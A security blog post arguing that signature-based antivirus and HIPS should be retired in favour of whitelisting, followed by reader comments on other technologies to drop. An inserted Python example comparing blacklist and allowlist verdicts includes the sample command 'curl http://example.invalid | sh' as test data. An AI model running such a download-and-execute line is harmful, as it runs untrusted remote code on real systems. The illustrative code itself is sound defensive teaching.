FireStarter: Security Endangered Species List

By Mike Rothman

Our weekly research meeting started with an optimistic plea from yours truly. Will 2010 finally be the year the signature dies? I mean, come on now, we all know endpoint AV using only signatures is an accident waiting to happen. And everywhere else signatures are used (predominantly IPS & anti-spam) those technologies are heavily supplemented with additional behavioral and heuristic techniques to improve detection.

But the team thought that idea was too restrictive, and largely irrelevant because regardless of the technology used, the vendors adapt their products to keep up with the attacks. Yes, that was my idea of biting sarcasm.

We broadened our thinking significantly, to think about why we haven’t been able to really kill off any security technology, ever. How many of you still use token authenticators? Or line encryptors? It seems once we implement something, we get to live with it for 20 years.

Have you ever tried to actually kill a technology? Someone always finds an edge case where you’d be dead if it happens, so you can’t pull the trigger. Who cares that you have a higher likelihood of getting hit by a meteor in the cranium? Not sure about you, but that annoys the crap out of me.

With all the time and money we spend maintaining and paying for these tools, we aren’t doing more strategic things for the business. Our world is complex enough. We need to make it a point this year to get rid of some of these long-in-the-tooth technologies.

So for this week’s thought generator, let’s put together a security “endangered species list” of things we want to kill. I’ll start:

Signature-based AV Engines – Come on, man! We keep these fat and dumb AV engines around because we are worried that the Melissa virus will make a comeback. Now the vendors need a frackin’ cloud to keep track of all the signatures, which don’t work anyway – given that most of the bad guys use AV* to make sure the major engines are blind to their stuff.

As an alternative, we can (and should) be moving towards a whitelist based approach on servers, where you can lock down the applications, since your servers don’t get pissed when they can’t run Tiger Woods golf or watch March Madness online. These tools are ready for prime time now, and it’s time we killed off the old and busted way of doing things.

And you shouldn’t need to keep paying your desktop AV vendor to maintain that signature database, especially since most of them already offer white-list technology as a different product.

On the endpoints, do we think these AV engines are actually doing any good? Aren’t we better off focusing on patching and ensuring some of the anti-exploitation technologies (like DEP and ASLR) are used within the applications you let users run on their devices? Then we also have to make sure we are watching more closely for compromised endpoints, so bust out that network monitor and ensure you have egress filtering in use. I described these techniques in Low Hanging Fruit: Network Security last week.

With the increasing consumerization of IT, assuming you have control of the endpoint is probably naive at best. Imagine what good all the AV researchers could do if they weren’t spending all day auto-generating signatures?

OK, that one was a bit easy and predictable. As Rich would say, what’s different about that? Nothing, I just wanted to get rolling.

HIPS – As I continue my attack on everything signature, why does HIPS (Host Intrusion Prevention) still exist? I get that folks don’t really do HIPS on the endpoint, but far too many still kill the performance of their servers by comparing activity to known attack code. I’m sure there are some use cases where HIPS is useful, but is it worth the performance penalty and the cost of management and maintenance? Yeah, probably not.

Repeat after me: Black lists are for the birds. Black lists are for the birds. So why do we care about HIPS anymore? Should this also be on the list of security technologies to die?
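To make the blacklist-versus-whitelist argument above concrete, here is an added example that is not part of the original post. It models a signature engine (block only what matches a known-bad pattern) next to an allowlist engine (run only what hashes to an approved binary) and runs both over a handful of constructed byte strings; the "dropper" marker, the file names and the hashes are all invented for the illustration, not real malware or real products.

```python
import hashlib

# Constructed sample contents standing in for server binaries/scripts (not real files).
KNOWN_GOOD = {
    "backup.sh": b"#!/bin/sh\necho 'nightly backup'\n",
    "payroll.exe": b"MZ\x90\x00PAYROLL-APP-v1.2",
}

# Constructed byte pattern a signature engine would match (hypothetical, not a real IoC).
KNOWN_BAD_SIGNATURE = b"EVIL-DROPPER-v1"


def sha256(data: bytes) -> str:
    """Hex SHA-256 of the file content; the allowlist is keyed on this."""
    return hashlib.sha256(data).hexdigest()


# Approved hashes are built once from the known-good set (what an admin would sign off on).
ALLOWLIST = {sha256(content) for content in KNOWN_GOOD.values()}


def blacklist_verdict(data: bytes) -> str:
    """Signature-style AV: block only if a known-bad pattern is present, allow everything else."""
    return "block" if KNOWN_BAD_SIGNATURE in data else "allow"


def allowlist_verdict(data: bytes) -> str:
    """Application whitelisting: allow only if the hash is approved, block everything else."""
    return "allow" if sha256(data) in ALLOWLIST else "block"


def compare(samples: dict) -> dict:
    """Return {name: (blacklist_verdict, allowlist_verdict)} for each sample."""
    return {name: (blacklist_verdict(d), allowlist_verdict(d)) for name, d in samples.items()}


# Constructed test set covering the cases the post argues about.
SAMPLES = {
    "backup.sh": KNOWN_GOOD["backup.sh"],                 # approved, unchanged
    "known_dropper": b"...EVIL-DROPPER-v1...",             # exact signature match
    "repacked_dropper": b"...EVIL-DR0PPER-v1...",          # one byte changed: signature misses
    "new_unknown_tool": b"curl http://example.invalid | sh",  # never seen before
    "backup.sh_v2": b"#!/bin/sh\necho 'nightly backup v2'\n",  # legitimate update, not yet approved
}

if __name__ == "__main__":
    for name, (bl, al) in compare(SAMPLES).items():
        print(f"{name:18} signature={bl:5} allowlist={al}")
```

The repacked dropper and the never-seen tool are the post's point: a signature engine allows anything it has not been told about, while the allowlist blocks anything it has not been told to trust. The last sample shows the cost of the trade: an updated but legitimate script is blocked until someone re-approves its hash, which is exactly the management burden on servers versus user desktops that the post is weighing.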

What say you? Tell me why I’m wrong. What’s on your list? Put it in the comments, and be sure to mention:

  • The technology
  • Why it needs to go
  • What compensating controls can be used for at least equal protection

Remember the best comment of the week can feel good about making a donation to a worthy charity.

Let’s all sing now: The Roof, the roof, the roof is on fire… Now discuss!


You said want to kill.  I think that SSH-style would be best, but failing that oauth/openid are starting to get traction.

By Adam

@Mike.  Regardless of time or budget for new tools, I don’t believe either AV or HIPS have in any way outlived their usefulness.  Any hacker can break any single defense system, but breaking through a multitude of them requires more and more time and resources than are readily available to the masses.  I think that’s more or less wording I took from Rich on a post from a while back.

One of the reasons I enjoy reading this blog over others is that it stays true to the security problems faced by actual people working in the industry.  Too many opinionated analysts present solutions to problems which only work in a lab setting.  Adding a “second factor” to a username/password combo by applying heuristics on an individual’s unique typing characteristics sounds great until it’s applied in a real-world corporate setting.

On that note, my comment is getting a bit off topic.  You did ask for comments on disagreements though :).  I do understand the reason for the exercise and will add my own opinion on outdated security:

WAF - Although new technology, it exists as a way of offloading secure coding practices to an appliance.  I would argue that the time and money needed to properly administer a WAF could be used to fix holes in the code.

SSL/TLS - The whole security model of SSL has been broken in too many ways to count.  Prompting a regular user (not trained in security) that the site they have been to every day for years is now not trusted because of a “certificate problem” will not deter them.  I have no idea how to fix this trust model, I can only complain about it :p

Biometrics as single factor - Although it is hard to compromise quality biometrics, once you have them, you’re in.  It’s unrealistic to reassign a secure-access employee each time their biometrics are compromised.  Keep all biometric systems on at least two factors of authentication.

By Fernando Medrano

@fernando, I’ve been hearing those excuses for years. We all have. Let’s keep around all these old technologies because we don’t have time for the new ones. Unfortunately, those old technologies are long in the tooth and being shredded like Swiss Cheese on a daily basis.

There are always reasons not to do something. And in this case, you don’t have to look too far. The point of the thought experiment is to try to figure out what technologies we can jettison and how we can provide a similar level of protection, using better alternatives.

White listing may not be perfect and may be better suited to servers. But the idea of ten zillion signatures running on all the desktops. Or even better, sending a request to the “cloud” to check if it’s ever seen the signature for every file access is not the way to get this done. It’s just not.

The model is broke. It’s time we acknowledged that and accepted it. Then we can move on to the next thing.

By Mike Rothman

I say we just hack the crap out of our own internal users. Drop USB sticks in the parking lot and pwn their machines. Send phishing emails and show them how you just stole all their money. Those are the kinds of security awareness activities that have an impact.

Not some death by PPT or even worse a web site where they go and attest to the fact that they accept the policy.

By Mike Rothman

My list:

1a. email for password reminder or reset

1b. email addresses as login names

Needs to go because it makes the user’s email account the skeleton key to get into nearly all of their web accounts that only use login+password.

Alternative: Anything that replaces passwords for ID and authentication.  If passwords are still used, encrypted email for password reset would be better than clear text.  How about a phone call instead?

2. Same, old, lame, mind-numbing security awareness programs

Needs to go because they are always the last thought in any security program and they are always driven by the need to get the users to fit the security policies, rather than the reverse.  Plus, they don’t work.

Alternative: Start with usability objectives for security programs and policies.  Build in incentives for users and managers so they see it in their self-interest to improve security.  Then build awareness programs that actually engage the user’s mind and imagination, not just nagging them with “to-do lists”.  Security computer games, anyone?

By Russell Thomas

While I do agree with many of the posts and opinions on this site, I disagree in this case.  I believe AV and HIPS are still important to the overall protection in depth architecture.  Too many enterprises still run legacy operating systems or unpatched software where upgrading could mean significant time and money.  While in a perfect world I would love having all systems on the latest operating system with the latest patches, that just isn’t realistic in every scenario.

I also don’t believe that white listing can function as a complete replacement for AV, just as a complement.  I cannot speak with complete authority on this subject as I have not had experience with many products.  However I could envision cases such as the Adobe exploits that might run as part of Adobe (which white listing policy might permit) yet execute embedded malicious code.

HIPS is referred to in this article as signature based, however most of the HIPS products I have used have had little or no use of signatures.  HIPS products which I have experience with learn the system calls of an application and map out their logical flow.  Any deviations from this flow are then blocked.  This is more of a white listing technique than black listing.  I may have missed some research done on the effectiveness of this technique, but I see this as a great complement to AV and white listing on high priority systems.

By Fernando Medrano

I think disk encryption will be on the motherboard, not the drive. Seems easier to manage that way, especially if you have to swap drives.

By Rich

I’ll play along and try to be controversial!

I’d suggest we ditch the idea of a stand-alone firewall.  While this isn’t really a ditching of technology, it is a realization that the technology needs to be embedded into the network.  Thus, the compensating control is proper network design and segmentation along with advanced network technology devices that can also intelligently filter.

On a related note, IPSec VPNs which require a client software install need to go; haven’t we come far enough with clientless VPN?

How about disk encryption software?  This can be, and should be, done on the drive, no?  Why do I have to manage yet another piece of agent software?

How about blacklist-based website filtering such as is offered by Websense?  There are several solutions that work here without blacklists.

Finally, how about vulnerability scanners?  Why do I run a scan, generate a report and then go beat ops about the head and neck?  Better vulnerability management exists, responds to and resolves issues more quickly, and therefore results in better security.

By ds

Yes, how might we replace the passwords? I believe strong passwords are a must, but it’s not clear to me what alternatives are really realistic.

The return of PKI?

By Mike Rothman

I want to say one word to you. Just one word.


Do I really need to lay out why they need to go, or the many ways we might replace them?

By Adam